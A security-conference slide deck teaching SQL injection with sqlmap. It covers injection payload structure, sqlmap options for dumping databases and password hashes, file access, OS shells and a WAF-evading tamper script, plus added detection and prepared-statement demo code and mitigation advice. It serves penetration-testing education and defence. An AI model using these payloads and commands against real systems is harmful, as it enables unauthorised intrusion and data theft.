Sql injection with sqlmap


Slides that I used when I presented @ Confraria VI and Security&IT in November 2012

  1. SQL injection with sqlmap
     Herman Duarte <hcoduarte@gmail.com>
     Tuesday, December 4, 12

  2. About me
     • Consultant @ INTEGRITY S.A. - www.integrity.pt
     • Penetration testing engagements
     • BSc in Information Systems and Computer Engineering
     • CISSP Associate / ISO27001LA / CCNA
     • Security addict :)

  3. Roadmap
     • SQL injection (SQLi) 101
     • sqlmap
     • Mitigation techniques
     • Wrap-up

  4. SQLi 101: Definition
     • Definition: SQL injection occurs when it is possible to inject SQL commands in data-plane input in order to affect the execution of predefined SQL statements.
     • It affects any application that uses non-sanitized user-supplied input in dynamic SQL query constructions (e.g. web apps, fat clients).
     • Cause: bad programming practices + lack of knowledge/awareness.

  5. SQLi 101: Structure
     An injected value is made of three parts:

         ...?name=robert' union all select null,@@version,null #
                   Prefix | Payload                            | Suffix

     The dynamic query being attacked:

         $query = "SELECT name,status,age FROM user WHERE name='" . $_REQUEST['search'] . "' AND age > 42";
  6. sqlmap
     • Developed in python
     • Prerequisites to run sqlmap: Python 2.6.x or 2.7.x
     • To install: git clone https://github.com/sqlmapproject/sqlmap.git sqlmap
     • To update: python sqlmap.py --update  (or: git pull)

  7. sqlmap
     Mainly developed by:
     • Bernardo Damele A.G. (@inquisb)
     • Miroslav Stampar (@stamparm)

  8. sqlmap: Scenarios
     • Find and explore SQL injection in web applications
     • Direct connection (database account is needed)
       - DBMS python binding installed (e.g. PyMySQL)
       - -d <dbms>://<user>:<password>@<ip>:<port>/<db_name>

  9. sqlmap: Workflow
     • Select your target
     • Identify possible injection points
     • Identify SQLi vulnerabilities:
       - By using sqlmap
       - Manual testing :)
     • Exploit SQLi vulnerabilities:
       - Enumerate
       - File system access
       - OS pwnage
       - Own the internal network (w00t! w00t!)

  10. sqlmap: Target selection
      • -u "<url>" (e.g. https://webapp.com/news.php?id=1)
      • -r <request file>, e.g.:

          GET /news.php?id=1&Submit=Submit HTTP/1.1
          Host: webapp.com
          User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
          Accept-Language: en-us,en;q=0.5
          Accept-Encoding: gzip, deflate
          Proxy-Connection: keep-alive
          Referer: https://webapp.com/index.php
          Cookie: PHPSESSID=l7uo2lheu067qrs8fjj0bab777;
          DNT: 1

  11. sqlmap: Injection points
      • GET parameters
      • POST parameters
      • Cookie header values (only if --level >= 2)
      • User-Agent header value (only if --level >= 3)
      • Referer header value (only if --level >= 3)
  12. sqlmap: Finding SQLi (I)
      • ./sqlmap.py -u "https://webapp.com/news.php?id=1"
        or
        ./sqlmap.py -r news_get_request --force-ssl
      • Default behavior: tests all GET and/or POST parameters, for all SQLi types, for all databases (if not discovered during tests)
      • Yes, it may take a long time, and it doesn't cover all tests sqlmap can do.

  13. sqlmap: Finding SQLi (II)
      • --level=<level> (1...5, default is 1)
        With --level=5 every combination of payload, prefix and suffix will be tested on all injection points available (noisier but gives more coverage)
      • --risk=<risk> (0...3, default is 1)
        To run tests using OR, use --risk=3. Why? Imagine this:
          UPDATE user SET disabled=1 WHERE email=email@email.com OR 1=1#
      • -p <param to test>[,<param to test>]

  14. sqlmap: SQLi techniques/types
      --technique=SU (default is all of them: BEUST)
      • Boolean-based blind: based on page changes, data is inferred char by char
      • Error-based: uses the errors that are displayed to extract data
      • Union query-based: changes the SQL queries to extract data
      • Stacked queries: semicolons are used to inject multiple statements into the SQL query
      • Time-based blind: based on time, data is inferred char by char

  15. sqlmap: Supported DBMSs
      --dbms=mssql | mysql | postgresql | oracle ...
      • Microsoft SQL Server
      • MySQL
      • PostgreSQL
      • Oracle
      • IBM DB2
      • SAP MaxDB
      • Sybase
      • Firebird
      • SQLite
      • Microsoft Access

  16. sqlmap: Logging / Verbosity
      • Logs all HTTP traffic in a text file: -t <output file>
      • Save options used in command line: --save <file>
      • Verbosity: -v <0..6> (default 1)
        -v 6 is the same as -t, but the output goes to the console
  17. sqlmap: Enumeration (I)
      Objective: get data from the DBMS tables (limited by the privileges the current DBMS user has)
      What can you get:
      • DBMS exact version, O.S. information, architecture and patch level: -f
      • DBMS banner: -b
      • DBMS server hostname: --hostname
      • DBMS user the application is using: --current-user
      • Application's current DB: --current-db
      • If the current user is a DBA: --is-dba

  18. sqlmap: Enumeration (II)
      What can you get: ...
      • List the DBMS users: --users
      • List all DBMS users' password hashes: --passwords
        sqlmap will automatically try to crack the hashes with a dictionary attack
      • List users' privileges: --privileges
      • List all available databases: --dbs
      • List all tables, or just those of a specific database: --tables (-D <database name>)

  19. sqlmap: Enumeration (III)
      What can you get: ...
      • List all columns, or just those of a specific table in a database: --columns (-T <table name> -D <db name>)
      • Count table entries: --count
      • Dump data from a database/table/column: --dump (-D, -T, -C can be used to select what data to dump)
        --dump-all (I don't recommend it)
      • Search for a specific database name, table name or column name, or part of one: --search (-D, -T, -C to specify what to search)

  20. sqlmap: Enumeration (IV)
      What can you get: ...
      • Execute a custom SQL query: --sql-query="<sql query to execute>"
      • Interactive SQL shell to execute all your custom SQL queries: --sql-shell
  21. sqlmap: File system access
      Objective: read and write any textual or binary file from the DBMS O.S.
      Prerequisites:
      • DBMS = mssql | mysql | postgresql
      • Current DBMS user must have the necessary privileges
      Read: --file-read="<file path>"
      Write: --file-write="<file local path>" --file-dest="<remote file location path>"

  22. sqlmap: OS pwnage (I)
      Objective: get access to the DBMS O.S. and the internal network (if the DBMS server is in the internal network)
      Prerequisites:
      • DBMS = mssql | mysql | postgresql
      • Current DBMS user must have the necessary privileges
      What can you do?
      • Get a reverse shell if the DB can:
        - connect to the internet
        - ping your server (yes, an ICMP shell :))
      • Establish a VNC connection

  23. sqlmap: OS pwnage (II)
      • To execute an OS command: --os-cmd="<command to execute>"
      • To get an OS shell: --os-shell
      • To get a meterpreter shell, an icmpshell or VNC: --os-pwn --msf-path="<msf path>"
      • Stored procedure privilege escalation (buffer overflow): --bof

  24. sqlmap: Tamper scripts
      • Tamper scripts: --tamper <script file path>[,<script file path>]
      • tamper/bluecoat.py:

          import re

          def tamper(payload, headers=None):
              """
              Example:
                  * Input: SELECT id FROM users where id = 1
                  * Output: SELECT%09id FROM users where id LIKE 1

              Requirement:
                  * MySQL, Blue Coat SGOS with WAF activated as documented in
                    https://kb.bluecoat.com/index?page=content&id=FAQ2147
              """
              # Replace the blank after a SQL keyword with a tab (sent as %09),
              # then replace every '=' comparison with the LIKE operator.
              retVal = payload
              if payload:
                  retVal = re.sub(r"(?i)(SELECT|UPDATE|INSERT|DELETE)\s+", r"\g<1>\t", payload)
                  retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)
              return retVal
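From the defender's side, the technique families of slide 14 and the evasions of slide 24 suggest what a log check has to do: URL-decode, undo whitespace and LIKE substitutions, then match. The following is an added example, not code from the slides or from sqlmap; the log lines, client addresses and signature list are constructed for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Constructed Common Log Format lines (not real traffic): one benign request,
# then one probe per technique family; the last two are tamper-encoded.
LOG_LINES = [
    '10.0.0.5 - - [04/Dec/2012:10:00:01 +0000] "GET /news.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [04/Dec/2012:10:00:02 +0000] "GET /news.php?id=1%27%20AND%201%3D1%23 HTTP/1.1" 200 512',
    '10.0.0.9 - - [04/Dec/2012:10:00:03 +0000] "GET /news.php?id=1%20UNION%20ALL%20SELECT%20NULL,@@version,NULL%23 HTTP/1.1" 200 611',
    '10.0.0.9 - - [04/Dec/2012:10:00:04 +0000] "GET /news.php?id=1;SELECT%09SLEEP(5)-- HTTP/1.1" 200 512',
    '10.0.0.9 - - [04/Dec/2012:10:00:05 +0000] "GET /news.php?id=1%27%20AND%201%20LIKE%201%23 HTTP/1.1" 200 512',
]

REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)')

# One signature per technique family from slide 14, applied to normalized text.
SIGNATURES = {
    "union":   re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "boolean": re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "time":    re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP|WAITFOR)\b", re.I),
    "stacked": re.compile(r";\s*(SELECT|INSERT|UPDATE|DELETE|EXEC)\b", re.I),
}

def normalize(path):
    # URL-decode, then undo the bluecoat-style evasions: collapse every blank
    # (tab, %09, newline) to one space and fold ' LIKE ' back to '='.
    text = re.sub(r"\s+", " ", unquote_plus(path))
    return re.sub(r"\s+LIKE\s+", "=", text, flags=re.I)

def classify(line):
    # Returns (client ip, [matching technique names]) or None for unparsable lines.
    m = REQUEST_RE.match(line)
    if not m:
        return None
    text = normalize(m.group("path"))
    return m.group("ip"), [n for n, rx in SIGNATURES.items() if rx.search(text)]

def suspicious(lines):
    # {ip: sorted technique names} for every client that sent at least one probe.
    out = {}
    for line in lines:
        res = classify(line)
        if res and res[1]:
            out.setdefault(res[0], set()).update(res[1])
    return {ip: sorted(h) for ip, h in out.items()}

if __name__ == "__main__":
    print(suspicious(LOG_LINES))
```

Without the normalize step the fourth and fifth lines would slip past the boolean and time signatures, which is exactly what a tamper script is for.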
  25. sqlmap: DEMO

  26. sqlmap: Tips
      • If HTTPS is being used, don't forget to set: --force-ssl
      • Get as much info as you can before starting to look for SQLi vulnerabilities. It will save you time.
      • Union-based gives more data with fewer requests; use it.
      • Time-based blind SQLi is faster to check than union-based queries (in cases where a lot of columns are used).
      • If --is-dba=true and --technique=S, you can start to gangnam style.

  27. Mitigation Techniques
      • Sanitize input
      • Use prepared statements / bind variables
      • Configure DBMS users with the least-privilege principle in mind
      • Use generic errors; don't pass them to the user
      • In case the web application source code can't be changed, a proxy can be used between the web server and the database server (e.g. GreenSQL)
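To make the prepared-statement advice of slide 27 concrete against the query of slide 5, here is an added example (not from the slides) that builds the same query both ways in Python on an in-memory SQLite table. SQLite has no @@version and no # comment, so the payload uses sqlite_version() and the -- comment instead; the user rows are constructed.

```python
import sqlite3

def make_db():
    # Constructed sample data standing in for the application's user table.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user (name TEXT, status TEXT, age INTEGER)")
    con.executemany("INSERT INTO user VALUES (?,?,?)",
                    [("robert", "active", 51), ("alice", "locked", 29)])
    return con

def search_vulnerable(con, search):
    # String concatenation exactly as in the PHP snippet on slide 5: the input
    # becomes SQL text, so prefix/payload/suffix rewrite the whole statement.
    query = ("SELECT name,status,age FROM user WHERE name='"
             + search + "' AND age > 42")
    return con.execute(query).fetchall()

def search_prepared(con, search):
    # Bind variable: the statement text is fixed and the value travels
    # separately, so the input can only ever match (or not match) a name.
    query = "SELECT name,status,age FROM user WHERE name=? AND age > 42"
    return con.execute(query, (search,)).fetchall()

# Same three parts as slide 5: the prefix closes the string literal, the
# payload appends a UNION, the suffix comments out the rest of the query.
PREFIX = "robert'"
PAYLOAD = " union all select null,sqlite_version(),null"
SUFFIX = "--"
INJECTED = PREFIX + PAYLOAD + SUFFIX

def demo():
    con = make_db()
    return {
        "vulnerable": search_vulnerable(con, INJECTED),  # extra row with the DB version
        "prepared": search_prepared(con, INJECTED),      # no row matches that literal name
        "legit": search_prepared(con, "robert"),         # the intended lookup still works
    }

if __name__ == "__main__":
    for label, rows in demo().items():
        print(label, rows)
```

Note that the vulnerable query also loses its age filter, since the suffix comments out "AND age > 42" along with the closing quote.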
  28. Wrap-up
      • Input sanitization
      • Use prepared statements
      • Least-privilege principle is your friend (use it!)
      • Have I said to use prepared statements?! :)
      • Do code reviews

  29. References
      • https://sqlmap.org
      • Advanced SQL injection to operating system full control - http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857
      • SQL Injection Attacks and Defenses - http://www.amazon.com/Injection-Attacks-Defense-Justin-Clarke/dp/1597494240

  30. Thank You! Q&A
      Herman Duarte
      @hdontwit
      https://www.linkedin.com/in/hcoduarte
      hcoduarte@gmail.com